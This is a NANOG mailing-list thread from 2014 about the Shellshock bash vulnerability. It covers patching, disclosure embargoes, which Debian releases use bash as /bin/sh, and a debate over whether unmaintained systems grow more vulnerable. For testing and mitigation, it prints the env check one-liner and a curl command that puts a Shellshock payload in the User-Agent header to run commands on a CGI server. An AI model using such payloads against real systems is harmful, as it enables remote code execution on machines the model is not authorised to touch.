there is an update out you want. badly. debian/ubuntu admins may want to apt-get update/upgrade or whatever. freebsd similarly. can not speak for other systems.
Can I presume you’re talking about the bash CVE-2014-6271? - jared
On Sep 24, 2014, at 3:05 PM, Randy Bush <randy@psg.com> wrote:
there is an update out you want. badly. debian/ubuntu admins may want to apt-get update/upgrade or whatever freebsd similarly can not speak for other systems
See: http://seclists.org/oss-sec/2014/q3/650 Regards, SG On 9/24/2014 1:05 PM, Randy Bush wrote:
there is an update out you want. badly. debian/ubuntu admins may want to apt-get update/upgrade or whatever freebsd similarly can not speak for other systems
sigh. i am well aware of it but saw no benefit for further blabbing a vuln.

randy
Keeping silent after the embargo is over isn't doing anyone any favors. I think Florian said it best in his most recent message:

"In this particular case, I think we had to publish technical details so that those who cannot patch immediately can at least try to mitigate this vulnerability using filters on devices in front of web servers, or tools like mod_security. And without the technical details, I doubt this vulnerability would have received the attention it deserves until someone figures things out. We could easily have obfuscated the patch to delay this, but what's the point?"

For anyone who would like to see if a system is vulnerable:

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

If "vulnerable" is echoed, your version of bash is affected. (An expanded version of this check, with example output, follows the quoted text below.)

Regards, SG

On 9/24/2014 1:10 PM, Randy Bush wrote:
See: http://seclists.org/oss-sec/2014/q3/650 sigh. i am well aware of it but saw no benefit for further blabbing a vuln
randy
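To make that check concrete (the output shown is illustrative; the exact wording of the warnings varies with the vendor's patch level):

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test

A patched bash refuses to import the booby-trapped "function" and only runs the intended command, typically with a warning like:

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test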
when do you think the embargo is over?
ref: http://seclists.org/oss-sec/2014/q3/650 "At present, public disclosure is scheduled for Wednesday, 2014-09-24 14:00 UTC. We do not expect the schedule to change, but we may be forced to revise it."
Date: Wed, 24 Sep 2014 15:07:26 -0400 From: Jared Mauch <jared@puck.nether.net> To: Randy Bush <randy@psg.com> Cc: North American Network Operators' Group <nanog@nanog.org> Subject: Re: update X-Mailer: Apple Mail (2.1985.4)
Can I presume you’re talking about the bash CVE-2014-6271?
Date: Wed, 24 Sep 2014 13:09:19 -0600 From: Spencer Gaw <spencerg@frii.net> To: Randy Bush <randy@psg.com>, North American Network Operators' Group <nanog@nanog.org> Subject: Re: update User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Thunderbird/31.1.1
Both are > 2014-09-24 14:00 UTC by my count. Unless the embargo got extended? On Thu 2014-Sep-25 13:05:45 +0900, Randy Bush <randy@psg.com> wrote:
Keeping silent after the embargo is over isn't doing anyone any favors.
when do you think the embargo is over?
yes, it got blabbed. but that does not mean one should be a blabber.
randy
-- Hugo
Does anyone know if there is an official/unofficial vendor/manufacturer list yet pointing to each vendor's official vulnerability webpage? I thought I saw one when Heartbleed broke out. -- Later, Joe On Wed, Sep 24, 2014 at 9:41 PM, Hugo Slabbert <hugo@slabnet.com> wrote:
when do you think the embargo is over?
ref: http://seclists.org/oss-sec/2014/q3/650
"At present, public disclosure is scheduled for Wednesday, 2014-09-24 14:00 UTC. We do not expect the schedule to change, but we may be forced to revise it."
Date: Wed, 24 Sep 2014 15:07:26 -0400
From: Jared Mauch <jared@puck.nether.net> To: Randy Bush <randy@psg.com> Cc: North American Network Operators' Group <nanog@nanog.org> Subject: Re: update X-Mailer: Apple Mail (2.1985.4)
Can I presume you’re talking about the bash CVE-2014-6271?
Date: Wed, 24 Sep 2014 13:09:19 -0600
From: Spencer Gaw <spencerg@frii.net> To: Randy Bush <randy@psg.com>, North American Network Operators' Group < nanog@nanog.org> Subject: Re: update User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Thunderbird/31.1.1
Both are > 2014-09-24 14:00 UTC by my count. Unless the embargo got extended?
On Thu 2014-Sep-25 13:05:45 +0900, Randy Bush <randy@psg.com> wrote:
Keeping silent after the embargo is over isn't doing anyone any
favors.
when do you think the embargo is over?
yes, it got blabbed. but that does not mean one should be a blabber.
randy
-- Hugo
fsf put out a statement https://fsf.org/news/free-software-foundation-statement-on-the-gnu-bash-shel... -- --------------------------------------------------------------- Joly MacFie 218 565 9365 Skype:punkcast WWWhatsup NYC - http://wwwhatsup.com http://pinstand.com - http://punkcast.com VP (Admin) - ISOC-NY - http://isoc-ny.org -------------------------------------------------------------- -
The scope of the issue isn't limited to SSH, that's just a popular example people are using. Any program calling bash could potentially be vulnerable. On Wed, Sep 24, 2014 at 6:11 PM, Jim Popovitch <jimpop@gmail.com> wrote:
debian/ubuntu admins may want to apt-get update/upgrade or whatever
debian/ubuntu aren't really all that immediately impacted.
$ grep "bash$" /etc/passwd | wc -l
2
^^ both of those are user accounts, not system/daemon accounts.
-Jim P.
On Wed, Sep 24, 2014 at 6:17 PM, Brandon Whaley <redkrieg@gmail.com> wrote:
The scope of the issue isn't limited to SSH, that's just a popular example people are using. Any program calling bash could potentially be vulnerable.
Agreed. My point was that bash is not all that popular on debian/ubuntu for accounts that would be running public facing services that would be processing user defined input (www-data, cgi-bin, list, irc, lp, mail, etc). Sure some non-privileged user could host their own cgi script on >:1024, but that's not really a critical "stop the presses!!" upgrade issue, imho. -Jim P.
On 9/24/14, 3:27 PM, Jim Popovitch wrote:
On Wed, Sep 24, 2014 at 6:17 PM, Brandon Whaley <redkrieg@gmail.com> wrote:
The scope of the issue isn't limited to SSH, that's just a popular example people are using. Any program calling bash could potentially be vulnerable. Agreed. My point was that bash is not all that popular on debian/ubuntu for accounts that would be running public facing services that would be processing user defined input (www-data, cgi-bin, list, irc, lp, mail, etc). Sure some non-privileged user could host their own cgi script on >:1024, but that's not really a critical "stop the presses!!" upgrade issue, imho.
This has already made it to /. so I'm not sure why Randy was being so hush-hush... But my read is that this could affect anything that calls bash to do processing, like handing off to CGI by putting in headers to p0wn the box. Also: bash is incredibly pervasive through any unix distro, in not-at-all-obvious places, so I wouldn't be complacent about this at all.

Mike
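A concrete sketch of the header vector Mike describes, for probing a host you are authorized to test (the hostname and CGI path here are hypothetical): the web server copies request headers into environment variables such as HTTP_USER_AGENT before running the CGI, so a function-definition payload in any header reaches whatever bash the CGI invokes.

$ curl -A '() { :;}; echo Content-Type: text/plain; echo; /usr/bin/id' http://www.example.com/cgi-bin/status.sh

If the CGI is executed by an unpatched bash, the response body contains the output of /usr/bin/id instead of the script's normal output; a patched server returns the normal page.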
On Sep 24, 2014 6:39 PM, "Michael Thomas" <mike@mtcc.com> wrote:
On 9/24/14, 3:27 PM, Jim Popovitch wrote:
On Wed, Sep 24, 2014 at 6:17 PM, Brandon Whaley <redkrieg@gmail.com> wrote:
The scope of the issue isn't limited to SSH, that's just a popular example people are using. Any program calling bash could potentially be vulnerable.
Agreed. My point was that bash is not all that popular on debian/ubuntu for accounts that would be running public facing services that would be processing user defined input (www-data, cgi-bin, list, irc, lp, mail, etc). Sure some non-privileged user could host their own cgi script on >:1024, but that's not really a critical "stop the presses!!" upgrade issue, imho.
This is already made it to /. so I'm not sure why Randy was being so hush hush...
But my read is that this could affect anything that calls bash to do
processing, like
handing off to CGI by putting in headers to p0wn the box. Also: bash is incredibly pervasive though any unix disto, in not at all obvious places, so I wouldn't be complacent about this at all.
Mike
If someone is already invoking #!/bin/bash from a cgi, then they are already doing it wrong (bash has massive bloat/overhead for a CGI script). But I do agree, it's hard to know exactly what idiots do. :-) -Jim P.
On 09/24/14 18:50, Jim Popovitch wrote:
On Sep 24, 2014 6:39 PM, "Michael Thomas" <mike@mtcc.com> wrote:
On 9/24/14, 3:27 PM, Jim Popovitch wrote:
On Wed, Sep 24, 2014 at 6:17 PM, Brandon Whaley <redkrieg@gmail.com> wrote:
The scope of the issue isn't limited to SSH, that's just a popular example people are using. Any program calling bash could potentially be vulnerable. Agreed. My point was that bash is not all that popular on debian/ubuntu for accounts that would be running public facing services that would be processing user defined input (www-data, cgi-bin, list, irc, lp, mail, etc). Sure some non-privileged user could host their own cgi script on >:1024, but that's not really a critical "stop the presses!!" upgrade issue, imho.
This is already made it to /. so I'm not sure why Randy was being so hush hush... But my read is that this could affect anything that calls bash to do
processing, like
handing off to CGI by putting in headers to p0wn the box. Also: bash is incredibly pervasive though any unix disto, in not at all obvious places, so I wouldn't be complacent about this at all.
Mike If someone is already invoking #!/bin/bash from a cgi, then they are already doing it wrong (bash has massive bloat/overhead for a CGI script). But I do agree, it's hard to know exactly what idiots do. :-)
Maybe just misinformed; they become idiots if they keep doing it after someone points it out to them =D
-Jim P.
On Wed, 24 Sep 2014 18:50:05 -0400, Jim Popovitch said:
If someone is already invoking #!/bin/bash from a cgi, then they are already doing it wrong (bash has massive bloat/overhead for a CGI script).
You sure you don't have *any* CGIs that do something like

system("mail -s 'cgi program xxyz hit fatal error' webadmin@localhost");

because all it takes is finding a way to force the fatal error while you send a crafted User-Agent: header.... As Michael Thomas said, bash usage is incredibly pervasive....
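A minimal local sketch of that chain (nothing here touches a real CGI; the variable name mirrors what a web server would export for the User-Agent header, and the echo stands in for the actual mail command): system() hands its command line to /bin/sh, and if that shell is an unpatched bash (as on RHEL-family systems), the imported "function" runs before the command itself. bash -c is used explicitly here to show the effect.

$ export HTTP_USER_AGENT='() { :;}; echo payload ran'
$ bash -c 'echo pretend this is the mail command'
payload ran
pretend this is the mail command

A patched bash prints only the second line (plus, on some versions, a warning that the function definition was ignored).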
On Sep 24, 2014 7:00 PM, <Valdis.Kletnieks@vt.edu> wrote:
On Wed, 24 Sep 2014 18:50:05 -0400, Jim Popovitch said:
If someone is already invoking #!/bin/bash from a cgi, then they are already doing it wrong (bash has massive bloat/overhead for a CGI
script).
You sure you don't have *any* cgi's that do something like system("mail -s 'cgi program xxyz hit fatal error' webadmin@localhost"); because all it takes is finding a way to force the fatal error while you send a crafted User-Agent: header....
That won't automatically invoke bash on Debian/Ubuntu....unless someone intentionally changed default shells.... -Jim P.
On 09/24/2014 07:22 PM, Jim Popovitch wrote:
That won't automatically invoke bash on Debian/Ubuntu....unless someone intentionally changed default shells....
-Jim P.
People seem not to know that Debian and derivatives use a variant Almquist shell rather than bash for system accounts. Daniel
Once upon a time, Daniel Jackson <fdj@mindspring.com> said:
On 09/24/2014 07:22 PM, Jim Popovitch wrote:
That won't automatically invoke bash on Debian/Ubuntu....unless someone intentionally changed default shells....
People seem not to know that Debian and derivatives use a variant Almquist shell rather than bash for system accounts.
It doesn't have much to do with default shells or system account settings; it has everything to do with what is /bin/sh. I think /bin/sh has been dash (derived from NetBSD's Almquist shell) on Debian-derived systems for a while now. Other major Linux distributions, e.g. the RHEL/Fedora family and IIRC SuSE, use bash as /bin/sh though, so they should be patched ASAP (especially if they are web servers).

Has anybody looked to see if the popular web software that users install and don't maintain (e.g. Wordpress, phpBB, Joomla, Drupal) uses system() or the like to call out to external programs? What about service provider type stuff like RT? I know Nagios calls out to shell scripts for notifications and such, and passes some things in environment variables (don't know if it can be tricked in this fashion though).

-- Chris Adams <cma@cmadams.net>
On Wed, Sep 24, 2014 at 7:41 PM, Chris Adams <cma@cmadams.net> wrote:
Has anybody looked to see if the popular web software the users install and don't maintain (e.g. Wordpress, phpBB, Joomla, Drupal) use system()
Wouldn't it be great if it were JUST system()? It's also popen(), shell_exec(), passthru(), exec(), and the backtick operator. I am pretty sure ALL of them use at least one of these in various places out of the box, and many plugins use these as well, such that a shell could be invoked; popen() on $sendmail is particularly common. (A rough audit sketch follows below.)
or the like to call out to external programs? What about service provider type stuff like RT? I know Nagios calls out to shell scripts
-- -JH
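A crude way to start that audit on a typical LAMP box (a sketch only; the docroot path is illustrative, this will produce plenty of false positives, and it misses backtick usage entirely):

$ grep -rlE 'system\(|exec\(|popen\(|shell_exec\(|passthru\(' /var/www 2>/dev/null | head

Anything that turns up and builds its command line from request data, mail headers, or uploaded file names deserves a closer look, because the shell those calls spawn is whatever /bin/sh (or an explicitly requested bash) happens to be.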
On Wed, Sep 24, 2014 at 7:36 PM, Daniel Jackson <fdj@mindspring.com> wrote:
On 09/24/2014 07:22 PM, Jim Popovitch wrote:
That won't automatically invoke bash on Debian/Ubuntu....unless someone intentionally changed default shells....
People seem not to know that Debian and derivatives use a variant Almquist shell rather than bash for system accounts.
You're both wrong.

$ cat /etc/issue
Debian GNU/Linux 7 \n \l

$ ls -laF /bin/sh
lrwxrwxrwx 1 root root 4 Nov 17 2011 /bin/sh -> bash*

$ grep root /etc/passwd
root:x:0:0:root:/root:/bin/bash

If you installed Debian from scratch in the last couple of years you might have gotten a different system shell. Those of us who have been using Debian for a *long time* were asked once during one upgrade whether we wanted the upgrade to change our defaults and generally said no. Welcome to production fellas, where the bleeding edge latest thing isn't what's installed.

Regards, Bill Herrin

-- William Herrin ................ herrin@dirtside.com bill@herrin.us Owner, Dirtside Systems ......... Web: <http://www.dirtside.com/> Can I solve your unusual networking challenges?
On Wed, Sep 24, 2014 at 10:29 PM, William Herrin <bill@herrin.us> wrote:
On Wed, Sep 24, 2014 at 7:36 PM, Daniel Jackson <fdj@mindspring.com> wrote:
On 09/24/2014 07:22 PM, Jim Popovitch wrote:
That won't automatically invoke bash on Debian/Ubuntu....unless someone intentionally changed default shells....
People seem not to know that Debian and derivatives use a variant Almquist shell rather than bash for system accounts.
You're both wrong.
$ cat /etc/issue Debian GNU/Linux 7 \n \l
$ ls -laF /bin/sh lrwxrwxrwx 1 root root 4 Nov 17 2011 /bin/sh -> bash* $ grep root /etc/passwd root:x:0:0:root:/root:/bin/bash
You have done something wrong/different than what appears on a relatively clean install:

$ cat /etc/issue
Debian GNU/Linux 7 \n \l

$ cat /etc/debian_version
7.6

$ ls -laF /bin/sh
lrwxrwxrwx 1 root root 4 Mar 1 2012 /bin/sh -> dash*

$ grep root /etc/passwd
root:x:0:0:root:/root:/bin/sh

I'm curious now... did you install a server or desktop version of Debian? Was it from netinst or cds, etc.?

-Jim P.
On Wed, Sep 24, 2014 at 10:43 PM, Jim Popovitch <jimpop@gmail.com> wrote:
You have done something wrong/different than what appears on a relatively clean install:
Since you didn't read it, I'm gonna repeat it: "If you installed Debian from scratch in the last couple of years you might have gotten a different system shell. Those of us who have been using Debian for a *long time* were asked once during one upgrade whether we wanted the upgrade to change our defaults and generally said no. Welcome to production fellas, where the bleeding edge latest thing isn't what's installed." -Bill -- William Herrin ................ herrin@dirtside.com bill@herrin.us Owner, Dirtside Systems ......... Web: <http://www.dirtside.com/> Can I solve your unusual networking challenges?
On Wed, Sep 24, 2014 at 10:49 PM, William Herrin <bill@herrin.us> wrote:
On Wed, Sep 24, 2014 at 10:43 PM, Jim Popovitch <jimpop@gmail.com> wrote:
You have done something wrong/different than what appears on a relatively clean install:
Since you didn't read it, I'm gonna repeat it:
"If you installed Debian from scratch in the last couple of years you might have gotten a different system shell. Those of us who have been using Debian for a *long time* were asked once during one upgrade whether we wanted the upgrade to change our defaults and generally said no.
Welcome to production fellas, where the bleeding edge latest thing isn't what's installed."
I *did* read that, and it doesn't change anything about what I wrote. Debian didn't make those changes for you...... Debian has never set root's shell to bash, ever. PEBKAC? -Jim P.
On Wed, Sep 24, 2014 at 10:52 PM, Jim Popovitch <jimpop@gmail.com> wrote:
I *did* read that, and it doesn't change anything about what I wrote. Debian didn't make those changes for you...... Debian has never set root's shell to bash, ever. PEBKAC?
I've been running Debian for longer than the dash shell has existed. What do you imagine the default shell was back then? Definitely PEBKAC. You just picked the wrong chair. -Bill -- William Herrin ................ herrin@dirtside.com bill@herrin.us Owner, Dirtside Systems ......... Web: <http://www.dirtside.com/> Can I solve your unusual networking challenges?
On Sep 24, 2014 10:56 PM, "William Herrin" <bill@herrin.us> wrote:
On Wed, Sep 24, 2014 at 10:52 PM, Jim Popovitch <jimpop@gmail.com> wrote:
I *did* read that, and it doesn't change anything about what I wrote. Debian didn't make those changes for you...... Debian has never set root's shell to bash, ever. PEBKAC?
I've been running Debian for longer than the dash shell has existed. What do you imagine the default shell was back then?
chisel & stone? :-) j/k I'm probably also old enough to remember, but I don't really care to.
Definitely PEBKAC. You just picked the wrong chair.
I'm seeing that. -Jim P.
On Wed, 24 Sep 2014, Jim Popovitch wrote:
I *did* read that, and it doesn't change anything about what I wrote. Debian didn't make those changes for you...... Debian has never set root's shell to bash, ever. PEBKAC?
I can verify William's settings on my Debian system that was initially installed back in 3.x days or so, probably around 2005 or thereabouts. My root shell uses bash and /bin/sh points to bash. I probably received a question about this sometime long ago when upgrading but I guess I answered no. -- Mikael Abrahamsson email: swmike@swm.pp.se
On Thu, Sep 25, 2014 at 05:11:22AM +0200, Mikael Abrahamsson wrote:
On Wed, 24 Sep 2014, Jim Popovitch wrote:
I *did* read that, and it doesn't change anything about what I wrote. Debian didn't make those changes for you...... Debian has never set root's shell to bash, ever. PEBKAC?
I can verify Williams settings on my Debian system that was initially installed back in 3.x days or so, probably around 2005 or thereabouts. My root shell uses bash and /bin/sh points to bash.
I haven't administered many Debian / Ubuntu systems recently, but I did during the days of hamm / slink / potato, and my recollection is that the *default* /bin/sh in 2.x and 3.x was bash, though it was possible to configure the system to use ash or something lighter weight instead. Doubt I currently have access to any systems that old, but:

% cat /etc/debian_version
5.0.4
% ls -al /bin/sh
lrwxrwxrwx 1 root root 4 2009-03-05 16:58 /bin/sh -> bash*
% which dash
dash not found

$ cat /etc/debian_version
5.0.9
$ ls -al /bin/sh
lrwxrwxrwx 1 root root 4 2010-08-02 12:21 /bin/sh -> bash*

So, I think "never... ever" is maybe not quite correct.

w
On Wed, Sep 24, 2014 at 9:43 PM, Jim Popovitch <jimpop@gmail.com> wrote:
You have done something wrong/different than what appears on a relatively clean install:
$ cat /etc/debian_version 7.6 $ ls -laF /bin/sh lrwxrwxrwx 1 root root 4 Mar 1 2012 /bin/sh -> dash*
What is this fabled 7.6 that you speak of? :)

:~# cat /etc/debian_version
4.0
:~# ls -ld /bin/sh
lrwxrwxrwx 1 root root 4 2014-02-22 11:52 /bin/sh -> bash

-- -JH
On Wed, Sep 24, 2014 at 10:56 PM, Jimmy Hess <mysidia@gmail.com> wrote:
On Wed, Sep 24, 2014 at 9:43 PM, Jim Popovitch <jimpop@gmail.com> wrote:
You have done something wrong/different than what appears on a relatively clean install:
$ cat /etc/debian_version 7.6 $ ls -laF /bin/sh lrwxrwxrwx 1 root root 4 Mar 1 2012 /bin/sh -> dash*
What is this fabled 7.6 that you speak of? :)
:~# cat /etc/debian_version 4.0
:~# ls -ld /bin/sh
lrwxrwxrwx 1 root root 4 2014-02-22 11:52 /bin/sh -> bash
ROFL. Jimmy, please tell me you had to start up a VM to check that. :) -Bill -- William Herrin ................ herrin@dirtside.com bill@herrin.us Owner, Dirtside Systems ......... Web: <http://www.dirtside.com/> Can I solve your unusual networking challenges?
On Wed, Sep 24, 2014 at 10:03 PM, William Herrin <bill@herrin.us> wrote:
lrwxrwxrwx 1 root root 4 2014-02-22 11:52 /bin/sh -> bash
ROFL. Jimmy, please tell me you had to start up a VM to check that. :)
Not a live system, but aside from honeypots, there really are embedded appliances and companies with websites still in production based on LAMP installations on Etch and Lenny. I understand dash didn't become the default /bin/sh until Debian Squeeze (6.0), which was within the past 4 years.
-Bill -- -JH
On Wed, Sep 24, 2014 at 11:19 PM, Jimmy Hess <mysidia@gmail.com> wrote:
On Wed, Sep 24, 2014 at 10:03 PM, William Herrin <bill@herrin.us> wrote:
lrwxrwxrwx 1 root root 4 2014-02-22 11:52 /bin/sh -> bash
ROFL. Jimmy, please tell me you had to start up a VM to check that. :)
Not a live system, but aside from honeypots, there really are embedded appliances and companies with websites still in production based on LAMP installations on Etch and Lenny.
Lots of small embedded Linux systems (e.g. your home router) are *not* vulnerable to this particular problem. A quick glance at 6 reasonably current home routers shows all are using the "ash" shell, rather than bash, as it is much smaller and part of busybox, which most of these devices use.

That being said, there are many, many other serious vulnerabilities in that class of device, compounded many times over by the fact that most lack any sort of update stream, and usually require manual update, if new firmware ever does become available. Those of you unfamiliar with The Moon worm should familiarize yourself with it. Consider it a shot across our bow....

For those of you who want to understand more about the situation we're all in, go look at my talk at the Berkman Center, and read the articles linked from there by Bruce Schneier and Dan Geer. http://cyber.law.harvard.edu/events/luncheon/2014/06/gettys

Jim Gettys
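For anyone who can get a shell on such a device, the same one-liner from earlier in the thread tells you what you are dealing with (the output shown is illustrative; many OpenWrt-style firmwares symlink /bin/sh to busybox):

$ ls -l /bin/sh
lrwxrwxrwx 1 root root 7 Jan 1 2014 /bin/sh -> busybox
$ env x='() { :;}; echo vulnerable' /bin/sh -c 'echo test'
test

busybox ash does not import shell functions from the environment, so only "test" is printed; an unpatched bash would print "vulnerable" first.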
On Friday, 26 September, 2014 08:37, Jim Gettys <jg@freedesktop.org> said:
For those of you who want to understand more about the situation we're all in, go look at my talk at the Berkman Center, and read the articles linked from there by Bruce Schneier and Dan Geer.
Unfortunately, that page contains near the top the ludicrous and impossible assertion:

""Familiarity Breeds Contempt: The Honeymoon Effect and the Role of Legacy Code in Zero-Day Vulnerabilities", by Clark, Fry, Blaze and Smith makes clear that ignoring these devices is foolhardy; unmaintained systems become more vulnerable, with time."

It is impossible for unchanged/unmaintained systems to develop more vulnerabilities with time. Perhaps what these folks mean is that "vulnerabilities which existed from the time the system was first developed become more well known over time".

The fact that the folks in the next building can peep at your privates through the bedroom window on which you did not install blinds does not mean that the vulnerability only exists from the time it is published in the local tabloid -- it existed all along -- it did not "magically" come into existence at some point after the building was built, the window installed, and you moved in without putting up window blinds. The fact that you did not become aware of it until you saw a photograph of yourself doing unmentionable things only serves as the point in time at which you became aware of your failure to properly assess the posture of the system in the first place.
Jim Gettys
----- Original Message -----
From: "Keith Medcalf" <kmedcalf@dessus.com>
Unfortunately, that page contains near the top the ludicrous and impossible assertion:
""Familiarity Breeds Contempt: The Honeymoon Effect and the Role of Legacy Code in Zero-Day Vulnerabilities", by Clark, Fry, Blaze and Smith makes clear that ignoring these devices is foolhardy; unmaintained systems become more vulnerable, with time."
It is impossible for unchanged/unmaintained systems to develop more vulnerabilities with time. Perhaps what these folks mean is that "vulnerabilities which existed from the time the system was first developed become more well known over time".
That's not actually true. A running process, instantiated from a file of object code, derives its behavior from a number of interfaces: to the kernel, the libc, the filesystem of the machine it's run on, and even network interfaces off the machine.

While the device itself may be -- or seem to be -- immutable, unless you're certain that *nothing around it changed either*, you cannot rule out that things became vulnerabilities *as deployed* which were not so previously.

Ok, yes, that's partially equivalent to what you said, at least in the case of, say, consumer routers, booting from flash. But for code running on real OSs, it's possible for a vulnerability to "appear" because something under or beside the code got updated, turning something which could not be attacked into something which could. I haven't an example case, but it is theoretically possible.

Cheers, -- jra

-- Jay R. Ashworth Baylink jra@baylink.com Designer The Things I Think RFC 2100 Ashworth & Associates http://www.bcp38.info 2000 Land Rover DII St Petersburg FL USA BCP38: Ask For It By Name! +1 727 647 1274
On Sat, Sep 27, 2014 at 8:10 PM, Jay Ashworth <jra@baylink.com> wrote:
I haven't an example case, but it is theoretically possible.
Qmail-smtpd has a buffer overflow vulnerability related to integer overflow which can only be reached when compiled on a 64-bit platform. x86_64 did not exist when the code was originally written. If memory serves, the author never acknowledged the vulnerability and declined to pay bounty or fix the bug stating that nobody allows gigabytes of RAM per smtp process. However.... you see, there you have a lingering bug that can be exposed under the right environment.... (Year 2030... computers have Petabytes of RAM... why would you seriously limit any one process to less than a terabyte....?) -> http://www.guninski.com/where_do_you_want_billg_to_go_today_4.html
Cheers, -- jra -- -JH
On Saturday, 27 September, 2014 20:49, Jimmy Hess said:
On Sat, Sep 27, 2014 at 8:10 PM, Jay Ashworth <jra@baylink.com> wrote:
I haven't an example case, but it is theoretically possible.
Qmail-smtpd has a buffer overflow vulnerability related to integer overflow which can only be reached when compiled on a 64-bit platform. x86_64 did not exist when the code was originally written.
If memory serves, the author never acknowledged the vulnerability and declined to pay bounty or fix the bug stating that nobody allows gigabytes of RAM per smtp process.
However.... you see, there you have a lingering bug that can be exposed under the right environment.... (Year 2030... computers have Petabytes of RAM... why would you seriously limit any one process to less than a terabyte....?)
-> http://www.guninski.com/where_do_you_want_billg_to_go_today_4.html
** The person making the change in this instance is referred to as "you". This is not to imply that it is any of you personally, but simply because it is easier to write using that pronoun rather than figuring out an appropriate third-person descriptive. I personally think "the retard" is most appropriate, but then that is just me :)

In this case however, you have implemented a change and it has changed the vulnerability profile. Presumably at one point you were running Qmail-smtpd on x86 (32-bit). You introduced a change (x86 -> x64) which changed the vulnerability profile. Perhaps you implemented two changes -- one to an x64 kernel, and second to an x64 userland. Whatever the case, there was still a change, and it was only because of the change that the vulnerability manifested. If you had not made the change, you would not have introduced the vulnerability. That your assessment of the change in vulnerability profile resulting from your change was defective is the whole point of this discussion.

If you had been rational about the change from x86 -> x64 and 32-bit userland to 64-bit userland, you would have limited all processes to the same per-process address space as they had in the x86 model in order to prevent the introduction of vulnerabilities such as this, and only permitted larger address spaces for processes that required them (ie, were part of the justification for making the change). If the change was "thrust upon you" with no justification, then the "thruster" should be terminated (with extreme prejudice, if possible). Notwithstanding, if you are responsible for the Safety and Security of the system changed, you should go stand in the corner for failing to perform your job adequately, or perhaps be promoted to management where you will no longer be a threat.

And the assumption about "(Year 2030... computers have Petabytes of RAM... why would you seriously limit any one process to less than a terabyte....?)" implies that there is an intent to implement further change. Before you make the change to "computers having petabytes of RAM" and "not limiting any process to less than a terabyte of per process address space", I would hope that you would assess the impact of that change. Especially since you now have additional information on which to generate a more accurate assessment of the impact of making that change, and what mitigations you should put in place when you make that change to prevent yourself from being either terminated with extreme prejudice or promoted to management (unless, of course, those are your goals). One of the reasons for "limiting a process to less than a terabyte of process address space" is that not doing so may lead to the manifestation of vulnerabilities such as the one discussed here.

My original proposition still holds perfectly:

(1) The vulnerability profile of a system is fixed at system commissioning.
(2) Vulnerabilities do not get created nor destroyed except through implementation of change.
(3) If there is no change to a system, then there can be no change in its vulnerabilities.

Of course, you must set the boundaries of "system" correctly. Choosing the wrong boundary may cause you to mislead yourself as to what a particular change may impact.
My original proposition still holds perfectly:
(1) The vulnerability profile of a system is fixed at system commissioning.
(2) Vulnerabilities do not get created nor destroyed except through implementation of change.
(3) If there is no change to a system, then there can be no change in its vulnerabilities.
Your original proposition is pointlessly academic. Yes, given absolutely no changes to the system, its vulnerability profile does not change.

Does your "correct" system boundary include the file system? So your definition of an unchanging system only uses read-only file systems. Does it include the system's load average? Can't ever change the number of clients connected to it... Does it include the system's uptime? Etc.

So yes, you're right. The number of existing vulnerabilities in a system never changes. It's just that you've also ruled out every system I can imagine being even remotely useful in life, so your argument seems to apply to _nothing_.

What does change for a system is the threat profile as exploits become better known. Arguing that it is better to blissfully march onward with what is *known* to be a vulnerable system instead of rolling out stable branch security updates that *generally* contain fewer bugs demonstrates a lack of pragmatism.

I'm sorry that someone on the Internet hasn't precisely used your made-up distinction between a "vulnerability profile" and the actual threat level given the current state of the rest of the universe. We really don't need to be splitting hairs about this on the NANOG list...

-- Kenneth Finnegan http://blog.thelifeofkenneth.com/
On Saturday, 27 September, 2014 23:29, Kenneth Finnegan <kennethfinnegan2007@gmail.com> said:
My original proposition still holds perfectly:
(1) The vulnerability profile of a system is fixed at system commissioning. (2) Vulnerabilities do not get created nor destroyed except through implementation of change. (3) If there is no change to a system, then there can be no change in its vulnerabilities.
Your original proposition is pointlessly academic. Yes, given absolutely no changes to the system, it's vulnerability profile does not change.
Does your "correct" system boundary include the file system? So you're definition of an unchanging system only uses read-only file systems.
Now that would depend, would it not. If you mean as in storing "data" or processing "data", then obviously not. If you mean the "executable contents" as in "the contents of the filesystem which are executed as part of the system" then obviously yes. Changing the "data" content of the filesystem is, in general, why one would implement a system in the first place. However, changing "executable contents" which are then executed implies a change which must be assessed.
Does it include the system's load average? Can't ever change the number of clients connected to it... Does it include the system's uptime? Etc.
These are only relevant if they are vulnerabilities. If these things are vulnerabilities I should hope that mitigations are in place to prevent them from being exploited, and that these mitigations were put in place from the get-go rather than when they appeared on CNN.
So yes, you're right. The number of existing vulnerabilities in a system never changes. It's just that you've also ruled out every system I can imagine being even remotely useful in life, so your argument seems to apply to _nothing_.
No, it applies to everything. It applies to routers and switches and it applies to Mail Servers, and to everything else.

When a network device is implemented everyone makes the assumption that it is, other than its designed function (switching packets), a zero-security device. This is why there is control-plane policing. This is why you segregate the management network. This is why you create isolated management access. This is why you do not open up telnet, ssh, ftp, tftp, http, and whatever else to "anyone" on the internet. If you do this properly, you do not care much about vulnerabilities in telnet, ssh, ftp, tftp, or http because they cannot be exploited (or rather, any such issues can only be exploited by a known set of actors). You have put mitigations in place to address the risks and any possible vulnerabilities. Just because no one has yet demonstrated a vulnerability does not mean that it does not exist.

If you have done this properly (ie, you acted prudently), you no longer care whether there are vulnerabilities or not, because you already have mitigations in place that would prevent them from being exploited (whether they exist or not). Then every time you see on CNN that there is a new major flaw in the swashbuckle that can be taken advantage of by a bottle of whiskey, you pat yourself on the back and congratulate yourself on having already assessed that there might be a problem in the swashbuckle when whiskey was present, so you already put in mitigations to prevent that. Or maybe you decided that you don't need to swashbuckle at all so you disabled that feature, in which case you don't really care about the supply of whiskey either.
What does change for a system is the threat profile as exploits become better known. Arguing that it is better to blissful march onward with what is *known* to be a vulnerable system instead of rolling out stable branch security updates that *generally* contain less bugs demonstrates a lack of pragmatism.
No, blindly rolling out patches which fix things that do not need fixing is foolhardy. It may very well be that the particular version of IOS running has a vulnerability in the http server portion of the software. However, that service is disabled because after rational evaluation it was decided (when the system was implemented) that the http feature was not required and as part of prudent policy, things which are not required were disabled. Therefore, implementation of the change to fix the vulnerability provides zero benefit. In fact, implementation of the change may have other detrimental effects which I will not know until after implementing the change. Therefore, the cost/benefit and risk analysis clearly indicates that the change should not be made.

